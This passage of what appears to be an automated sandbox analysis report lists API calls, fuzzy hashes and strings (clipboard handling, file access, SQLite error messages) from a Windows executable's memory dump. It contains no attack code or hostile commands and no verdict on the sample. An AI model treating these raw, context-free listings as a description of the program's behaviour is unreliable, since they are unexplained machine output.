                                                                                                                                                                  • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3655998216-0
                                                                                                                                                                • Opcode ID: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                                                                                                                                • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                                                                • Opcode Fuzzy Hash: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                                                                                                                                • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 00445426
                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1828521557-0
                                                                                                                                                                • Opcode ID: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                                                                                                                • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                                                                • Opcode Fuzzy Hash: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                                                                                                                • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                  • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                                • memcpy.MSVCRT ref: 00406942
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??2@FilePointermemcpy
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 609303285-0
                                                                                                                                                                • Opcode ID: ff2b83ec1290d704cc9ef70c9b0cd29b753561e2494ca983cce7aef5439f8322
                                                                                                                                                                • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                                                                                • Opcode Fuzzy Hash: ff2b83ec1290d704cc9ef70c9b0cd29b753561e2494ca983cce7aef5439f8322
                                                                                                                                                                • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _wcsicmp
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2081463915-0
                                                                                                                                                                • Opcode ID: d19f359b0b47db267e5fce9c2c3eaec783a9e0147a5c7e9f99ecd470ce03f4be
                                                                                                                                                                • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                                                                • Opcode Fuzzy Hash: d19f359b0b47db267e5fce9c2c3eaec783a9e0147a5c7e9f99ecd470ce03f4be
                                                                                                                                                                • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2136311172-0
                                                                                                                                                                • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                                                                • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                                • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??2@??3@
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1936579350-0
                                                                                                                                                                • Opcode ID: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                                                                                                                • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                                                                                • Opcode Fuzzy Hash: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                                                                                                                • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                                • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                                • GlobalFix.KERNEL32(00000000), ref: 00409927
                                                                                                                                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                                • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                                • GetLastError.KERNEL32 ref: 0040995D
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                                • GetLastError.KERNEL32 ref: 00409974
                                                                                                                                                                • CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2565263379-0
                                                                                                                                                                • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                                • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                                                                                                • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                                • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4218492932-0
                                                                                                                                                                • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                                                                                • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • EmptyClipboard.USER32 ref: 00409882
                                                                                                                                                                • wcslen.MSVCRT ref: 0040988F
                                                                                                                                                                • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                                                                                • GlobalFix.KERNEL32(00000000), ref: 004098AC
                                                                                                                                                                • memcpy.MSVCRT ref: 004098B5
                                                                                                                                                                • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                                                                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                                                                                • CloseClipboard.USER32 ref: 004098D7
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2014503067-0
                                                                                                                                                                • Opcode ID: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                                                                                                                                • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                                                                                • Opcode Fuzzy Hash: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                                                                                                                                • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset
                                                                                                                                                                • String ID: 8$P$P$at most %d tables in a join$cannot use index: %s
                                                                                                                                                                • API String ID: 2221118986-3931078971
                                                                                                                                                                • Opcode ID: 352f39a4052851f5244cadad483d96deb60f19b4e7e15b1b814bb6d9d36274e9
                                                                                                                                                                • Instruction ID: a4a7f51c7708a2cf2cee828f321a28954037f43b08d1d975c1b10d1e328082e6
                                                                                                                                                                • Opcode Fuzzy Hash: 352f39a4052851f5244cadad483d96deb60f19b4e7e15b1b814bb6d9d36274e9
                                                                                                                                                                • Instruction Fuzzy Hash: 27425171D00219DFEF14CF95C881AEEBBB1FF08314F14855AEA15AB251D738A9A1CF98
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: %$(NULL)$+$-x0$0123456789ABCDEF0123456789abcdef$NULL
                                                                                                                                                                • API String ID: 0-1412151055
                                                                                                                                                                • Opcode ID: 356290ff883ba16a91f74c7c07600848ac0c662310fb32b5c4ef676c4eb94a59
                                                                                                                                                                • Instruction ID: e0cc6b836fff892d006744b0329856caed0b51470de7c61c9c8f9526dc712ed7
                                                                                                                                                                • Opcode Fuzzy Hash: 356290ff883ba16a91f74c7c07600848ac0c662310fb32b5c4ef676c4eb94a59
                                                                                                                                                                • Instruction Fuzzy Hash: AD32C0319087918FD721CF18D5807EBBBE1AF95304F19495FE8C497252D378CA8ACB9A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                                                                • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                                                                                                                                                                  • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,76DBDF80,?,0041755F,?), ref: 00417452
                                                                                                                                                                  • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                                                                                                                                                                • String ID: OsError 0x%x (%u)
                                                                                                                                                                • API String ID: 403622227-2664311388
                                                                                                                                                                • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                                                                • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                                                                                • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                                                                • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                • table %S has %d columns but %d values were supplied, xrefs: 0043648A
                                                                                                                                                                • table %S has no column named %s, xrefs: 00436578
                                                                                                                                                                • %d values for %d columns, xrefs: 004364AA
                                                                                                                                                                • rows inserted, xrefs: 00436C5F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset
                                                                                                                                                                • String ID: %d values for %d columns$rows inserted$table %S has %d columns but %d values were supplied$table %S has no column named %s
                                                                                                                                                                • API String ID: 2221118986-2709362559
                                                                                                                                                                • Opcode ID: 7b94c5d234efde6920706e5b6cacbd729202f4f8f52a230b340b94b4ce83f046
                                                                                                                                                                • Instruction ID: 9c125d797f7739dd18a706fcf9805d15b4108fee604c20040dca07a78b4adc45
                                                                                                                                                                • Opcode Fuzzy Hash: 7b94c5d234efde6920706e5b6cacbd729202f4f8f52a230b340b94b4ce83f046
                                                                                                                                                                • Instruction Fuzzy Hash: 27929071E0021AFFDF10DF95C881BAEBBB1EF08314F15905AE905A7281D739AE51CB99
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset
                                                                                                                                                                • String ID: no such column: %s$rows updated
                                                                                                                                                                • API String ID: 2221118986-885832449
                                                                                                                                                                • Opcode ID: 090fb934ea269eb1917e993b163fb5e731bf21d5f4976c1895739f87e3f0432c
                                                                                                                                                                • Instruction ID: 7dcecc785416030557bf3e65fdb184edeeac1647f375ce5d724b37e86bd915e6
                                                                                                                                                                • Opcode Fuzzy Hash: 090fb934ea269eb1917e993b163fb5e731bf21d5f4976c1895739f87e3f0432c
                                                                                                                                                                • Instruction Fuzzy Hash: AB728871608301AFDB10DF19C881A1BBBE1FF88718F04581EF995A7292D739E951CF96
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                  • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                • OpenClipboard.USER32(?), ref: 00411878
                                                                                                                                                                • GetLastError.KERNEL32 ref: 0041188D
                                                                                                                                                                • DeleteFileW.KERNEL32(?), ref: 004118AC
                                                                                                                                                                  • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                                  • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                                  • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                                  • Part of subcall function 004098E2: GlobalFix.KERNEL32(00000000), ref: 00409927
                                                                                                                                                                  • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                                  • Part of subcall function 004098E2: GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                                  • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                                  • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                                  • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastNameOpenPathReadSizeWindowsWire
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1203541146-0
                                                                                                                                                                • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                                                                                                • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                                                                                                                                                                • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                                                                                                                                • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: >PD$>PD
                                                                                                                                                                • API String ID: 0-241360673
                                                                                                                                                                • Opcode ID: 636fa6e870849a123d623615516b3e2858f70bd84403162da8d36c2a659e764e
                                                                                                                                                                • Instruction ID: 8e2198200500fa0fc3bc88275214576e19b26caf2554f569e41e4ab64c40c239
                                                                                                                                                                • Opcode Fuzzy Hash: 636fa6e870849a123d623615516b3e2858f70bd84403162da8d36c2a659e764e
                                                                                                                                                                • Instruction Fuzzy Hash: 0B81D630D091E58FDB0A8B7D88901BDFFF4EF9A20075442AED8D2E7346C6744A11CBA1
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: UUUU$g|@
                                                                                                                                                                • API String ID: 0-841461634
                                                                                                                                                                • Opcode ID: f341a98deb1e5e92d7066587e62b77daad1dfda02a02c613fc9f81484624d4c1
                                                                                                                                                                • Instruction ID: 2d8d9101cd04074a5c169b043e39b4a3b006c2ce9d561f0fe2de225ae1ad389f
                                                                                                                                                                • Opcode Fuzzy Hash: f341a98deb1e5e92d7066587e62b77daad1dfda02a02c613fc9f81484624d4c1
                                                                                                                                                                • Instruction Fuzzy Hash: DA214C327745150BF39CE93D8C1376B62D2DBC8254B18CA3EA6A6C32C1EC6CE9138285
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??2@??3@memcpymemset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1865533344-0
                                                                                                                                                                • Opcode ID: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                                                                                                                                • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                                                                                                                • Opcode Fuzzy Hash: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                                                                                                                                • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                                                                                                Memory Dump Source
